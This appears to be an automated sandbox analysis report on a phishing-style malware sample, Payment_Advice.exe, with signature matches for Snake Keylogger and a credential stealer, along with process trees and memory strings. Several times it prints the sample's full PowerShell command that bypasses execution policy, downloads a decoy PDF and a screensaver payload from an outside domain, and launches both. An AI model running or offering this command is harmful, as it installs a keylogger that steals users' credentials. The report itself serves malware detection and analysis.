            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 23.2.hadvices.scr.2dbf460.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 23.2.hadvices.scr.2dc1ca0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.301f558.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.3021d98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects downloader injector | Author: ditekSHen
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
            Source: initial sample | Static PE information: Filename: Payment_Advice.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\Temp\hadvices.scr
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00408AF4 NtdllDefWindowProc_W,DestroyWindow,GetWindowLongW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,DestroyWindow,UnregisterClassW,2_2_00408AF4
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0145AA28 | 0_2_0145AA28
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_01459150 | 0_2_01459150
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0041ABC0 | 2_2_0041ABC0
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040C4D8 | 2_2_0040C4D8
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040E4A0 | 2_2_0040E4A0
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040EE6A | 2_2_0040EE6A
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00410EF0 | 2_2_00410EF0
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00410290 | 2_2_00410290
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00410359 | 2_2_00410359
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040FF70 | 2_2_0040FF70
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00410313 | 2_2_00410313
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040AF87 | 2_2_0040AF87
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040FF90 | 2_2_0040FF90
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACCA210E | 4_2_00007FFAACCA210E
            Source: C:\Windows\Temp\hadvices.scr | Code function: 23_2_0157AA28 | 23_2_0157AA28
            Source: C:\Windows\Temp\hadvices.scr | Code function: 23_2_01579150 | 23_2_01579150
            Source: C:\Windows\Temp\hadvices.scr | Code function: 23_2_015730D0 | 23_2_015730D0
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_016663C8 | 25_2_016663C8
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01667550 | 25_2_01667550
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01667540 | 25_2_01667540
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01660FC0 | 25_2_01660FC0
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01776168 | 25_2_01776168
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177C1F0 | 25_2_0177C1F0
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177B388 | 25_2_0177B388
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177C4D0 | 25_2_0177C4D0
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177C7B2 | 25_2_0177C7B2
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01776790 | 25_2_01776790
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_017798B8 | 25_2_017798B8
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_01774B31 | 25_2_01774B31
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177FA10 | 25_2_0177FA10
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177CA92 | 25_2_0177CA92
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177EDF0 | 25_2_0177EDF0
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177BC32 | 25_2_0177BC32
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177BF10 | 25_2_0177BF10
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177E310 | 25_2_0177E310
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177E300 | 25_2_0177E300
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_0177B552 | 25_2_0177B552
            Source: C:\Windows\Temp\hadvices.scr | Code function: 25_2_017735CA | 25_2_017735CA
            Source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198509905.0000000004015000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1196271509.000000000120E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000000.1194113240.0000000000D1C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.exe
            Source: Payment_Advice.exe | Binary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.exe
            Source: Payment_Advice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 23.2.hadvices.scr.3e03d90.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.404e590.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.31018e4.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.31018e4.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.5590000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.5330000.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.2dbf460.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.2dc1ca0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.301f558.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.3021d98.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, DarkListView.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, -O-.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, -O-.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, DarkComboBox.cs | Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: Payment_Advice.exe, ----.cs | Suspicious method names: ._DBB0_DED3_FFFD_FFFD.InjectEvent
            Source: Payment_Advice.exe, C---.cs | Suspicious method names: .C_FFFD_0333_FFFD.InjectEvent
            Source: Payment_Advice.exe, -U.cs | Suspicious method names: ._05B5U.InjectEvent
            Source: Payment_Advice.exe, ---.cs | Suspicious method names: ._0332_0332_FFFD.InjectEvent
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@28/57@8/7
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00402762 LoadResource,SizeofResource,FreeResource | 2_2_00402762
            Source: C:\Users\user\Desktop\Payment_Advice.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.exe.log
            Source: C:\Windows\Temp\hadvices.scr | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
            Source: C:\Users\user\Desktop\Payment_Advice.exe | File created: C:\Users\user\AppData\Local\Temp\9D53.tmp
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
            Source: Payment_Advice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Payment_Advice.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Payment_Advice.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000339F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000338F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2460553159.00000000041C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment_Advice.exe | ReversingLabs: Detection: 28%
            Source: Payment_Advice.exe | String found in binary or memory: -Additional exception information unavailable.
            Source: unknown | Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
